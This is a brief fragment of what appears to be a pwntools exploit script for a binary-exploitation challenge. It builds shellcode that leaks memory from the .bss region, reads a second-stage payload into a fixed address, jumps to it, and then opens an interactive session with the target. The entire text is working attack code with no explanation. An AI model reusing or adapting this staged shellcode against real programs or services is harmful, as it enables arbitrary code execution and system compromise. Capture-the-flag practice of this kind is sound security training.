shellcode += asm(shellcraft.write(1,bss+0x700, 0x400))
shellcode += asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (0x401311))
p.send(shellcode)
p.interactive()